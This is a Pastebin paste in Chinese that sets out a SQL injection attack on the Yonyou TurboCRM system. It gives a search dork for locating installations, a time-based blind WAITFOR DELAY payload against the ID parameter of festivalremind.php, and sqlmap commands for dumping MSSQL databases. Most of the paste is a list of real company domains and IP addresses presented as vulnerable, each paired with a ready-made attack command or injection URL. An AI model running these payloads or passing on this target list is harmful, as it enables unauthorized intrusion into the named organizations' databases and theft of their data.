Advertisement
Kyfx

用友TruboCRM管理系统SQL注入

Jun 20th, 2015
519
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.04 KB | None | 0 0
  1. Dork:intitle:用友TurboCRM intext:登录
  2.  
  3. background/festivalremind.php?ID=1
  4.  
  5. 注入参数:ID
  6.  
  7. Payload: ?ID=1; WAITFOR DELAY ’0:0:5’–
  8.  
  9. Sqlmap注入命令: sqlmap -u ’http://xxxxxx/background/festivalremind.php?ID=1’ –level 5 –risk 3 –thechnique=T –dbms mssql –dbs –random-agent –batch -v 3
  10.  
  11. 漏洞证明:
  12. 测试案例:
  13.  
  14. (1) http://crm.szclou.com:8088/background/festivalremind.php?ID=1
  15.  
  16. python sqlmap.py -u http://crm.szclou.com:8088/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 1 –random-agent –technique=T
  17.  
  18.  
  19.  
  20. (2)http://www.kdlian.com:8001/background/festivalremind.php?ID=1
  21. python sqlmap.py -u http://www.kdlian.com:8001/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 3 –random-agent –technique=T
  22.  
  23.  
  24. (3)http://218.94.82.23/background/festivalremind.php?ID=1
  25. python sqlmap.py -u http://218.94.82.23/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 3 –random-agent –technique=T
  26.  
  27.  
  28. 4)http://220.113.5.194/background/festivalremind.php?ID=1
  29. python sqlmap.py -u http://220.113.5.194/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 3 –random-agent –technique=T
  30.  
  31. 其他案例:
  32.  
  33. http://218.84.134.162:8088/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
  34.  
  35. http://crm.pearmain.cn/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
  36.  
  37. http://nc.shineroad.com/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
  38.  
  39. http://crm7.abgroup.cn/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
  40.  
  41. http://crm.transn.net/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
  42.  
  43. http://218.108.86.226/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
  44.  
  45. http://crm.yiwenkeji.com:8080/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
  46.  
  47. http://yindajituan.gicp.net:8888/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5’–
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement